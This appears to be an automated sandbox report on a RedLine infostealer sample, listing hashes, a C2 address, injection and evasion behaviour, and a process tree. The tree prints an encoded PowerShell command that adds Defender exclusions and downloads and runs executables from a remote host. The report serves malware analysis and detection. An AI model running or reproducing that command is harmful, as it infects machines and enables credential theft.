redline | 84374cb55c56fb530ef4f83f655ffeb7463e8c0452d7f13d57535d9e032e761f

Analysis

max time kernel
150s
max time network
119s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
11-11-2022 23:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

C4Loader.exe
Size

124KB
MD5

99f682f75994261bd769f11cd33820e7
SHA1

2d8f77e1aebc274f94c56626fe1a71514c01b439
SHA256

84374cb55c56fb530ef4f83f655ffeb7463e8c0452d7f13d57535d9e032e761f
SHA512

00ca067af16d76cd5e344065c3f6c223a5e35bf79b67759bfed26e1994bcbe36ca0ff0cfc10c4175659813a1501d8e5d9d64fbcaf98d92459ca052f15ff0f0db
SSDEEP

3072:x8Bwf9nPJ6+qVDRhIJTz7y1bJs6Httemsk3QnDPofdc:x8Snh2RIEJsKetudc

Score

10^/10

redline 1 evasion infostealer spyware upx

Malware Config

Extracted

Family

redline

Botnet

107.182.129.73:21733

Attributes

auth_value
3a5bb0917495b4312d052a0b8977d2bb

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 5 IoCs

Processes:

resource	yara_rule
behavioral1/memory/668-80-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/668-85-0x000000000041ADAE-mapping.dmp	family_redline
behavioral1/memory/668-87-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/668-90-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/2044-205-0x000000000041ADAE-mapping.dmp	family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 18 IoCs

Processes:

SmartDefRun.exeSmartScreenQC.exeSmartDefRun.exedialer.exepowershell.EXE

description	pid	process	target process
PID 1980 created 1276	1980	SmartDefRun.exe	Explorer.EXE
PID 1980 created 1276	1980	SmartDefRun.exe	Explorer.EXE
PID 1980 created 1276	1980	SmartDefRun.exe	Explorer.EXE
PID 1980 created 1276	1980	SmartDefRun.exe	Explorer.EXE
PID 1980 created 1276	1980	SmartDefRun.exe	Explorer.EXE
PID 1728 created 1276	1728	SmartScreenQC.exe	Explorer.EXE
PID 1728 created 1276	1728	SmartScreenQC.exe	Explorer.EXE
PID 1728 created 1276	1728	SmartScreenQC.exe	Explorer.EXE
PID 1348 created 1276	1348	SmartDefRun.exe	Explorer.EXE
PID 1348 created 1276	1348	SmartDefRun.exe	Explorer.EXE
PID 1348 created 1276	1348	SmartDefRun.exe	Explorer.EXE
PID 1728 created 1276	1728	SmartScreenQC.exe	Explorer.EXE
PID 1348 created 1276	1348	SmartDefRun.exe	Explorer.EXE
PID 1348 created 1276	1348	SmartDefRun.exe	Explorer.EXE
PID 1728 created 1276	1728	SmartScreenQC.exe	Explorer.EXE
PID 520 created 1276	520	dialer.exe	Explorer.EXE
PID 1728 created 1276	1728	SmartScreenQC.exe	Explorer.EXE
PID 568 created 416	568	powershell.EXE	winlogon.exe

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

4 2040 powershell.exe
9 1068 powershell.exe
Downloads MZ/PE file

flow	pid	process
4	2040	powershell.exe
9	1068	powershell.exe

Drops file in Drivers directory 3 IoCs

Processes:

SmartDefRun.exeSmartDefRun.exeSmartScreenQC.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	SmartDefRun.exe
File created	C:\Windows\System32\drivers\etc\hosts	SmartDefRun.exe
File created	C:\Windows\System32\drivers\etc\hosts	SmartScreenQC.exe

Executes dropped EXE 7 IoCs

Processes:

new2.exeSysApp.exeSmartDefRun.exeSmartScreenQC.exenew2.exeSysApp.exeSmartDefRun.exe

pid process

1488 new2.exe
1544 SysApp.exe
1980 SmartDefRun.exe
1728 SmartScreenQC.exe
1664 new2.exe
1760 SysApp.exe
1348 SmartDefRun.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
1488	new2.exe
1544	SysApp.exe
1980	SmartDefRun.exe
1728	SmartScreenQC.exe
1664	new2.exe
1760	SysApp.exe
1348	SmartDefRun.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1928-266-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Loads dropped DLL 17 IoCs

Processes:

powershell.exeWerFault.exetaskeng.exepowershell.exeWerFault.exe

pid	process
2040	powershell.exe
2040	powershell.exe
2040	powershell.exe
2040	powershell.exe
2040	powershell.exe
1996	WerFault.exe
1996	WerFault.exe
1996	WerFault.exe
1076	taskeng.exe
1068	powershell.exe
1068	powershell.exe
1068	powershell.exe
1068	powershell.exe
1068	powershell.exe
1364	WerFault.exe
1364	WerFault.exe
1364	WerFault.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 10 IoCs

Processes:

powershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 10 IoCs

Processes:

C4Loader.exenew2.exeC4Loader.exeSmartDefRun.exenew2.exeSmartScreenQC.exeSmartDefRun.exeC4Loader.exepowershell.EXE

description	pid	process	target process
PID 1092 set thread context of 976	1092	C4Loader.exe	vbc.exe
PID 1488 set thread context of 668	1488	new2.exe	vbc.exe
PID 1760 set thread context of 1988	1760	C4Loader.exe	vbc.exe
PID 1980 set thread context of 1896	1980	SmartDefRun.exe	dialer.exe
PID 1664 set thread context of 2044	1664	new2.exe	vbc.exe
PID 1728 set thread context of 520	1728	SmartScreenQC.exe	dialer.exe
PID 1348 set thread context of 1824	1348	SmartDefRun.exe	dialer.exe
PID 1728 set thread context of 1928	1728	SmartScreenQC.exe	dialer.exe
PID 1900 set thread context of 1712	1900	C4Loader.exe	vbc.exe
PID 568 set thread context of 340	568	powershell.EXE	dllhost.exe

Drops file in Program Files directory 5 IoCs

Processes:

cmd.exeSmartDefRun.exeSmartDefRun.exeSmartScreenQC.execmd.exe

description	ioc	process
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe	SmartDefRun.exe
File created	C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe	SmartDefRun.exe
File created	C:\Program Files\Google\Libs\WR64.sys	SmartScreenQC.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 15 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
1952	sc.exe
1776	sc.exe
1116	sc.exe
1144	sc.exe
1748	sc.exe
1088	sc.exe
1176	sc.exe
808	sc.exe
1188	sc.exe
1148	sc.exe
1116	sc.exe
1192	sc.exe
316	sc.exe
1624	sc.exe
1964	sc.exe

Program crash 5 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1364	1092	WerFault.exe	C4Loader.exe
1996	1488	WerFault.exe	new2.exe
1748	1760	WerFault.exe	C4Loader.exe
1364	1664	WerFault.exe	new2.exe
2000	1900	WerFault.exe	C4Loader.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

432 schtasks.exe
1908 schtasks.exe
936 schtasks.exe
1748 schtasks.exe

pid	process
432	schtasks.exe
1908	schtasks.exe
936	schtasks.exe
1748	schtasks.exe

Modifies data under HKEY_USERS 7 IoCs

Processes:

powershell.EXEWMIC.exedialer.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 804b4e332df6d801	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT\Certificates	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT\CRLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT\CTLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeSmartDefRun.exeSysApp.exepowershell.exepowershell.exepowershell.exepowershell.exeSmartScreenQC.exepowershell.exepowershell.EXEvbc.exepowershell.exeSmartDefRun.exepowershell.exepowershell.exeSysApp.exe

pid	process
2040	powershell.exe
2040	powershell.exe
2040	powershell.exe
2040	powershell.exe
2040	powershell.exe
2040	powershell.exe
2040	powershell.exe
2040	powershell.exe
2040	powershell.exe
1980	SmartDefRun.exe
1980	SmartDefRun.exe
1544	SysApp.exe
1544	SysApp.exe
1544	SysApp.exe
1544	SysApp.exe
1544	SysApp.exe
824	powershell.exe
1980	SmartDefRun.exe
1980	SmartDefRun.exe
1980	SmartDefRun.exe
1980	SmartDefRun.exe
1628	powershell.exe
1068	powershell.exe
1980	SmartDefRun.exe
1980	SmartDefRun.exe
1980	SmartDefRun.exe
1980	SmartDefRun.exe
1092	powershell.exe
1728	SmartScreenQC.exe
1728	SmartScreenQC.exe
1988	powershell.exe
1728	SmartScreenQC.exe
1728	SmartScreenQC.exe
1728	SmartScreenQC.exe
1728	SmartScreenQC.exe
568	powershell.EXE
668	vbc.exe
1628	powershell.exe
1068	powershell.exe
1068	powershell.exe
1068	powershell.exe
1068	powershell.exe
1068	powershell.exe
1068	powershell.exe
1068	powershell.exe
1068	powershell.exe
1348	SmartDefRun.exe
1348	SmartDefRun.exe
1908	powershell.exe
1348	SmartDefRun.exe
1348	SmartDefRun.exe
1348	SmartDefRun.exe
1348	SmartDefRun.exe
1728	SmartScreenQC.exe
1728	SmartScreenQC.exe
1260	powershell.exe
1760	SysApp.exe
1760	SysApp.exe
1760	SysApp.exe
1760	SysApp.exe
1760	SysApp.exe
1348	SmartDefRun.exe
1348	SmartDefRun.exe
1348	SmartDefRun.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

services.exe

pid process

460 services.exe

pid	process
460	services.exe

Suspicious use of AdjustPrivilegeToken 42 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEvbc.exepowershell.exepowershell.exepowershell.exepowershell.exevbc.exeWMIC.exepowershell.EXEdialer.exepowershell.exedllhost.exe

description	pid	process
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeDebugPrivilege	824	powershell.exe
Token: SeDebugPrivilege	1628	powershell.exe
Token: SeDebugPrivilege	1068	powershell.exe
Token: SeDebugPrivilege	1092	powershell.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeDebugPrivilege	568	powershell.EXE
Token: SeDebugPrivilege	668	vbc.exe
Token: SeDebugPrivilege	1628	powershell.exe
Token: SeDebugPrivilege	1908	powershell.exe
Token: SeDebugPrivilege	1260	powershell.exe
Token: SeDebugPrivilege	1252	powershell.exe
Token: SeDebugPrivilege	2044	vbc.exe
Token: SeAssignPrimaryTokenPrivilege	956	WMIC.exe
Token: SeIncreaseQuotaPrivilege	956	WMIC.exe
Token: SeSecurityPrivilege	956	WMIC.exe
Token: SeTakeOwnershipPrivilege	956	WMIC.exe
Token: SeLoadDriverPrivilege	956	WMIC.exe
Token: SeSystemtimePrivilege	956	WMIC.exe
Token: SeBackupPrivilege	956	WMIC.exe
Token: SeRestorePrivilege	956	WMIC.exe
Token: SeShutdownPrivilege	956	WMIC.exe
Token: SeSystemEnvironmentPrivilege	956	WMIC.exe
Token: SeUndockPrivilege	956	WMIC.exe
Token: SeManageVolumePrivilege	956	WMIC.exe
Token: SeDebugPrivilege	1376	powershell.EXE
Token: SeAssignPrimaryTokenPrivilege	956	WMIC.exe
Token: SeIncreaseQuotaPrivilege	956	WMIC.exe
Token: SeSecurityPrivilege	956	WMIC.exe
Token: SeTakeOwnershipPrivilege	956	WMIC.exe
Token: SeLoadDriverPrivilege	956	WMIC.exe
Token: SeSystemtimePrivilege	956	WMIC.exe
Token: SeBackupPrivilege	956	WMIC.exe
Token: SeRestorePrivilege	956	WMIC.exe
Token: SeShutdownPrivilege	956	WMIC.exe
Token: SeSystemEnvironmentPrivilege	956	WMIC.exe
Token: SeUndockPrivilege	956	WMIC.exe
Token: SeManageVolumePrivilege	956	WMIC.exe
Token: SeDebugPrivilege	568	powershell.EXE
Token: SeLockMemoryPrivilege	1928	dialer.exe
Token: SeDebugPrivilege	952	powershell.exe
Token: SeDebugPrivilege	340	dllhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

C4Loader.exevbc.exepowershell.exenew2.exeC4Loader.exevbc.exe

description	pid	process	target process
PID 1092 wrote to memory of 976	1092	C4Loader.exe	vbc.exe
PID 1092 wrote to memory of 976	1092	C4Loader.exe	vbc.exe
PID 1092 wrote to memory of 976	1092	C4Loader.exe	vbc.exe
PID 1092 wrote to memory of 976	1092	C4Loader.exe	vbc.exe
PID 1092 wrote to memory of 976	1092	C4Loader.exe	vbc.exe
PID 1092 wrote to memory of 976	1092	C4Loader.exe	vbc.exe
PID 1092 wrote to memory of 1364	1092	C4Loader.exe	WerFault.exe
PID 1092 wrote to memory of 1364	1092	C4Loader.exe	WerFault.exe
PID 1092 wrote to memory of 1364	1092	C4Loader.exe	WerFault.exe
PID 1092 wrote to memory of 1364	1092	C4Loader.exe	WerFault.exe
PID 976 wrote to memory of 2040	976	vbc.exe	powershell.exe
PID 976 wrote to memory of 2040	976	vbc.exe	powershell.exe
PID 976 wrote to memory of 2040	976	vbc.exe	powershell.exe
PID 976 wrote to memory of 2040	976	vbc.exe	powershell.exe
PID 2040 wrote to memory of 1760	2040	powershell.exe	C4Loader.exe
PID 2040 wrote to memory of 1760	2040	powershell.exe	C4Loader.exe
PID 2040 wrote to memory of 1760	2040	powershell.exe	C4Loader.exe
PID 2040 wrote to memory of 1760	2040	powershell.exe	C4Loader.exe
PID 2040 wrote to memory of 1488	2040	powershell.exe	new2.exe
PID 2040 wrote to memory of 1488	2040	powershell.exe	new2.exe
PID 2040 wrote to memory of 1488	2040	powershell.exe	new2.exe
PID 2040 wrote to memory of 1488	2040	powershell.exe	new2.exe
PID 2040 wrote to memory of 1544	2040	powershell.exe	SysApp.exe
PID 2040 wrote to memory of 1544	2040	powershell.exe	SysApp.exe
PID 2040 wrote to memory of 1544	2040	powershell.exe	SysApp.exe
PID 2040 wrote to memory of 1544	2040	powershell.exe	SysApp.exe
PID 1488 wrote to memory of 668	1488	new2.exe	vbc.exe
PID 1488 wrote to memory of 668	1488	new2.exe	vbc.exe
PID 1488 wrote to memory of 668	1488	new2.exe	vbc.exe
PID 1488 wrote to memory of 668	1488	new2.exe	vbc.exe
PID 1488 wrote to memory of 668	1488	new2.exe	vbc.exe
PID 1488 wrote to memory of 668	1488	new2.exe	vbc.exe
PID 1488 wrote to memory of 1996	1488	new2.exe	WerFault.exe
PID 1488 wrote to memory of 1996	1488	new2.exe	WerFault.exe
PID 1488 wrote to memory of 1996	1488	new2.exe	WerFault.exe
PID 1488 wrote to memory of 1996	1488	new2.exe	WerFault.exe
PID 2040 wrote to memory of 1980	2040	powershell.exe	SmartDefRun.exe
PID 2040 wrote to memory of 1980	2040	powershell.exe	SmartDefRun.exe
PID 2040 wrote to memory of 1980	2040	powershell.exe	SmartDefRun.exe
PID 2040 wrote to memory of 1980	2040	powershell.exe	SmartDefRun.exe
PID 1760 wrote to memory of 1668	1760	C4Loader.exe	vbc.exe
PID 1760 wrote to memory of 1668	1760	C4Loader.exe	vbc.exe
PID 1760 wrote to memory of 1668	1760	C4Loader.exe	vbc.exe
PID 1760 wrote to memory of 1668	1760	C4Loader.exe	vbc.exe
PID 1760 wrote to memory of 1404	1760	C4Loader.exe	vbc.exe
PID 1760 wrote to memory of 1404	1760	C4Loader.exe	vbc.exe
PID 1760 wrote to memory of 1404	1760	C4Loader.exe	vbc.exe
PID 1760 wrote to memory of 1404	1760	C4Loader.exe	vbc.exe
PID 1760 wrote to memory of 1884	1760	C4Loader.exe	vbc.exe
PID 1760 wrote to memory of 1884	1760	C4Loader.exe	vbc.exe
PID 1760 wrote to memory of 1884	1760	C4Loader.exe	vbc.exe
PID 1760 wrote to memory of 1884	1760	C4Loader.exe	vbc.exe
PID 1760 wrote to memory of 1988	1760	C4Loader.exe	vbc.exe
PID 1760 wrote to memory of 1988	1760	C4Loader.exe	vbc.exe
PID 1760 wrote to memory of 1988	1760	C4Loader.exe	vbc.exe
PID 1760 wrote to memory of 1988	1760	C4Loader.exe	vbc.exe
PID 1760 wrote to memory of 1988	1760	C4Loader.exe	vbc.exe
PID 1760 wrote to memory of 1988	1760	C4Loader.exe	vbc.exe
PID 1760 wrote to memory of 1748	1760	C4Loader.exe	WerFault.exe
PID 1760 wrote to memory of 1748	1760	C4Loader.exe	WerFault.exe
PID 1760 wrote to memory of 1748	1760	C4Loader.exe	WerFault.exe
PID 1760 wrote to memory of 1748	1760	C4Loader.exe	WerFault.exe
PID 1988 wrote to memory of 1068	1988	vbc.exe	powershell.exe
PID 1988 wrote to memory of 1068	1988	vbc.exe	powershell.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:476

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
- Suspicious behavior: LoadsDriver
PID:460

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:416

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{95608067-668c-487c-8098-e6949555b108}
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:340

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1276

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1092

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:976

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcgBwACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBnAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQBiAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBlAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACwAIAA8ACMAZQB0AHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBlAHkAagAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAGcAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAKQA8ACMAZQB0AHMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBvAG4AbgBlAGMAdAAyAG0AZQAuAGQAZABuAHMALgBuAGUAdAAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAG4AZQB3ADIALgBlAHgAZQAnACwAIAA8ACMAcgBiAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHAAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBsAGUAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBuAGUAdwAyAC4AZQB4AGUAJwApACkAPAAjAGYAaAB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBsAHAAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcwBjACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbQB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAG4AdABrACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACwAIAA8ACMAegB6AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB5AGgAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAHgAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAKQA8ACMAcQB4AHoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAagB0AG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAYwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQA8ACMAaABxAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBnAGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAawB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AZQB3ADIALgBlAHgAZQAnACkAPAAjAGsAcgBwACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAbQByACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAZgBiAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABmAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAaQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQA8ACMAYgBwAHMAIwA+AA=="
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2040

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
5⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1760

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
6⤵
PID:1404

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
6⤵
PID:1884

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
6⤵
PID:1668

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
6⤵
- Suspicious use of WriteProcessMemory
PID:1988

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
